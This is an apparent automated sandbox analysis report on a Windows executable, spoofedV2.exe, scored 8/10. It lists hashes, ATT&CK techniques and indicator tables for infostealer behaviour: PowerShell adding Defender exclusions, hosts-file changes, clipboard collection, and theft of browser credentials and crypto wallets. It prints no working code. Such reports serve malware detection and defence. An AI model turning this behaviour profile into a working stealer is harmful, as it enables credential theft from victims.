e9dbb65873885de12d31b6087a300a03d23eca8af63dd7b1b72927ad11406ea1

Analysis

max time kernel
210s
max time network
211s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
09/11/2024, 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

spoofedV2.exe
Size

12.0MB
MD5

a4a5c39c8ec652046f09c7a3fb2973fb
SHA1

d442d559c884081dc2199c99dd68f9d20ed5401c
SHA256

e9dbb65873885de12d31b6087a300a03d23eca8af63dd7b1b72927ad11406ea1
SHA512

51114488e7c2715f9fa1cc448dd4e0a45086aafb248a23a2cce89db70931f9d790d99f14b19102ab1c18a42ed94a54670a5703712d3b21ae6f613bcdbcc20bd7
SSDEEP

98304:0OzkwN+MdA5wqSnW9Z8MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DovaDJ1n6hBm:04V1vrB6ylnlPzf+JiJCsmFMvln6hqgs

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1944	powershell.exe
1104	powershell.exe
2980	powershell.exe
3728	powershell.exe
1840	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	spoofedV2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1028	powershell.exe
4284	cmd.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 2 IoCs

pid	Process
4952	rar.exe
2284	OneDriveSetup.exe

Loads dropped DLL 17 IoCs

pid	Process
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe
352	spoofedV2.exe

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDrive.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3160	tasklist.exe
1388	tasklist.exe
1652	tasklist.exe
3344	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3928	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x001900000002aacd-21.dat	upx
behavioral2/memory/352-25-0x00007FF8D23C0000-0x00007FF8D29AA000-memory.dmp	upx
behavioral2/files/0x001a00000002aab4-27.dat	upx
behavioral2/files/0x001900000002aacb-30.dat	upx
behavioral2/memory/352-48-0x00007FF8DC230000-0x00007FF8DC23F000-memory.dmp	upx
behavioral2/files/0x001900000002aac4-47.dat	upx
behavioral2/files/0x001900000002aac3-46.dat	upx
behavioral2/files/0x001900000002aac2-45.dat	upx
behavioral2/files/0x001900000002aac1-44.dat	upx
behavioral2/files/0x001900000002aac0-43.dat	upx
behavioral2/files/0x001a00000002aabb-42.dat	upx
behavioral2/files/0x001a00000002aab5-41.dat	upx
behavioral2/files/0x001b00000002aab2-40.dat	upx
behavioral2/files/0x001900000002aad4-38.dat	upx
behavioral2/memory/352-39-0x00007FF8D60F0000-0x00007FF8D6113000-memory.dmp	upx
behavioral2/files/0x001900000002aad3-37.dat	upx
behavioral2/files/0x001c00000002aad2-36.dat	upx
behavioral2/files/0x001c00000002aacc-33.dat	upx
behavioral2/files/0x001900000002aac8-32.dat	upx
behavioral2/memory/352-54-0x00007FF8D5FA0000-0x00007FF8D5FCD000-memory.dmp	upx
behavioral2/memory/352-56-0x00007FF8D8F80000-0x00007FF8D8F99000-memory.dmp	upx
behavioral2/memory/352-58-0x00007FF8D5C10000-0x00007FF8D5C33000-memory.dmp	upx
behavioral2/memory/352-60-0x00007FF8D2A70000-0x00007FF8D2BDF000-memory.dmp	upx
behavioral2/memory/352-62-0x00007FF8D83C0000-0x00007FF8D83D9000-memory.dmp	upx
behavioral2/memory/352-64-0x00007FF8D6870000-0x00007FF8D687D000-memory.dmp	upx
behavioral2/memory/352-66-0x00007FF8D5BE0000-0x00007FF8D5C0E000-memory.dmp	upx
behavioral2/memory/352-72-0x00007FF8D2300000-0x00007FF8D23B8000-memory.dmp	upx
behavioral2/memory/352-74-0x00007FF8D00B0000-0x00007FF8D0425000-memory.dmp	upx
behavioral2/memory/352-71-0x00007FF8D60F0000-0x00007FF8D6113000-memory.dmp	upx
behavioral2/memory/352-70-0x00007FF8D23C0000-0x00007FF8D29AA000-memory.dmp	upx
behavioral2/memory/352-76-0x00007FF8D5F80000-0x00007FF8D5F94000-memory.dmp	upx
behavioral2/memory/352-79-0x00007FF8D60E0000-0x00007FF8D60ED000-memory.dmp	upx
behavioral2/memory/352-78-0x00007FF8D5FA0000-0x00007FF8D5FCD000-memory.dmp	upx
behavioral2/memory/352-83-0x00007FF8D21E0000-0x00007FF8D22FC000-memory.dmp	upx
behavioral2/memory/352-160-0x00007FF8D5C10000-0x00007FF8D5C33000-memory.dmp	upx
behavioral2/memory/352-204-0x00007FF8D2A70000-0x00007FF8D2BDF000-memory.dmp	upx
behavioral2/memory/352-265-0x00007FF8D83C0000-0x00007FF8D83D9000-memory.dmp	upx
behavioral2/memory/352-282-0x00007FF8D5BE0000-0x00007FF8D5C0E000-memory.dmp	upx
behavioral2/memory/352-284-0x00007FF8D2300000-0x00007FF8D23B8000-memory.dmp	upx
behavioral2/memory/352-304-0x00007FF8D00B0000-0x00007FF8D0425000-memory.dmp	upx
behavioral2/memory/352-311-0x00007FF8D2A70000-0x00007FF8D2BDF000-memory.dmp	upx
behavioral2/memory/352-305-0x00007FF8D23C0000-0x00007FF8D29AA000-memory.dmp	upx
behavioral2/memory/352-319-0x00007FF8D21E0000-0x00007FF8D22FC000-memory.dmp	upx
behavioral2/memory/352-306-0x00007FF8D60F0000-0x00007FF8D6113000-memory.dmp	upx
behavioral2/memory/352-335-0x00007FF8D00B0000-0x00007FF8D0425000-memory.dmp	upx
behavioral2/memory/352-345-0x00007FF8D2300000-0x00007FF8D23B8000-memory.dmp	upx
behavioral2/memory/352-344-0x00007FF8D5BE0000-0x00007FF8D5C0E000-memory.dmp	upx
behavioral2/memory/352-343-0x00007FF8D6870000-0x00007FF8D687D000-memory.dmp	upx
behavioral2/memory/352-342-0x00007FF8D83C0000-0x00007FF8D83D9000-memory.dmp	upx
behavioral2/memory/352-341-0x00007FF8D2A70000-0x00007FF8D2BDF000-memory.dmp	upx
behavioral2/memory/352-340-0x00007FF8D5C10000-0x00007FF8D5C33000-memory.dmp	upx
behavioral2/memory/352-339-0x00007FF8D8F80000-0x00007FF8D8F99000-memory.dmp	upx
behavioral2/memory/352-338-0x00007FF8D5FA0000-0x00007FF8D5FCD000-memory.dmp	upx
behavioral2/memory/352-337-0x00007FF8D60F0000-0x00007FF8D6113000-memory.dmp	upx
behavioral2/memory/352-336-0x00007FF8DC230000-0x00007FF8DC23F000-memory.dmp	upx
behavioral2/memory/352-334-0x00007FF8D21E0000-0x00007FF8D22FC000-memory.dmp	upx
behavioral2/memory/352-320-0x00007FF8D23C0000-0x00007FF8D29AA000-memory.dmp	upx
behavioral2/memory/352-333-0x00007FF8D60E0000-0x00007FF8D60ED000-memory.dmp	upx
behavioral2/memory/352-332-0x00007FF8D5F80000-0x00007FF8D5F94000-memory.dmp	upx

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDrive.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDriveSetup.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1948	PING.EXE
1548	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4840	cmd.exe
4620	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	OneDrive.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	OneDrive.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3344	WMIC.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3332	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDrive.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133755957735794554"	chrome.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\odopen\shell	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /cci /client=Personal"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\VersionIndependentProgID	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ = "IDeviceHeroShotCallback"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib\Version = "1.0"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ = "ISyncInformationLookupCallback"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ = "ISyncEngineOcsi"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\odopen\DefaultIcon	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\FileSyncClient.AutoPlayHandler.1	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ = "IFileSyncClient4"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib\Version = "1.0"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{EE15BBBB-9E60-4C52-ABCB-7540FF3DF6B3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\ = "IItemActivityCallback"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\ProxyStubClsid32\ = "{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\FileSyncClient.AutoPlayHandler\ = "FileSyncClient AutoPlayHandler Class"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ = "IGetSelectiveSyncInformationCallback"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\OOBERequestHandler.OOBERequestHandler.1	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\TypeLib\{C9F3F6BB-3172-4CD8-9EB7-37C9BE601C87}\1.0\0\win64\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\amd64\\FileSyncShell64.dll"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ = "IDeviceHeroShotCallback"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Directory\shellex\ContextMenuHandlers\ FileSyncEx	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\AppID\OneDrive.EXE	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\ProgID\ = "SyncEngineFileInfoProvider.SyncEngineFileInfoProvider.1"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\LocalServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuth.exe"	OneDrive.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1948	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
848	OneDrive.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
1840	powershell.exe
1104	powershell.exe
1944	powershell.exe
1944	powershell.exe
1840	powershell.exe
1840	powershell.exe
1104	powershell.exe
1104	powershell.exe
1028	powershell.exe
1028	powershell.exe
3508	powershell.exe
3508	powershell.exe
1028	powershell.exe
3508	powershell.exe
2980	powershell.exe
2980	powershell.exe
4604	powershell.exe
4604	powershell.exe
3728	powershell.exe
3728	powershell.exe
3348	powershell.exe
3348	powershell.exe
4252	chrome.exe
4252	chrome.exe
2312	chrome.exe
2312	chrome.exe
2312	chrome.exe
2312	chrome.exe
848	OneDrive.exe
848	OneDrive.exe
2284	OneDriveSetup.exe
2284	OneDriveSetup.exe
2284	OneDriveSetup.exe
2284	OneDriveSetup.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe
4252	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	3344	tasklist.exe
Token: SeDebugPrivilege	3160	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3436	WMIC.exe
Token: SeSecurityPrivilege	3436	WMIC.exe
Token: SeTakeOwnershipPrivilege	3436	WMIC.exe
Token: SeLoadDriverPrivilege	3436	WMIC.exe
Token: SeSystemProfilePrivilege	3436	WMIC.exe
Token: SeSystemtimePrivilege	3436	WMIC.exe
Token: SeProfSingleProcessPrivilege	3436	WMIC.exe
Token: SeIncBasePriorityPrivilege	3436	WMIC.exe
Token: SeCreatePagefilePrivilege	3436	WMIC.exe
Token: SeBackupPrivilege	3436	WMIC.exe
Token: SeRestorePrivilege	3436	WMIC.exe
Token: SeShutdownPrivilege	3436	WMIC.exe
Token: SeDebugPrivilege	3436	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3436	WMIC.exe
Token: SeRemoteShutdownPrivilege	3436	WMIC.exe
Token: SeUndockPrivilege	3436	WMIC.exe
Token: SeManageVolumePrivilege	3436	WMIC.exe
Token: 33	3436	WMIC.exe
Token: 34	3436	WMIC.exe
Token: 35	3436	WMIC.exe
Token: 36	3436	WMIC.exe
Token: SeDebugPrivilege	1388	tasklist.exe
Token: SeDebugPrivilege	1028	powershell.exe
Token: SeIncreaseQuotaPrivilege	3436	WMIC.exe
Token: SeSecurityPrivilege	3436	WMIC.exe
Token: SeTakeOwnershipPrivilege	3436	WMIC.exe
Token: SeLoadDriverPrivilege	3436	WMIC.exe
Token: SeSystemProfilePrivilege	3436	WMIC.exe
Token: SeSystemtimePrivilege	3436	WMIC.exe
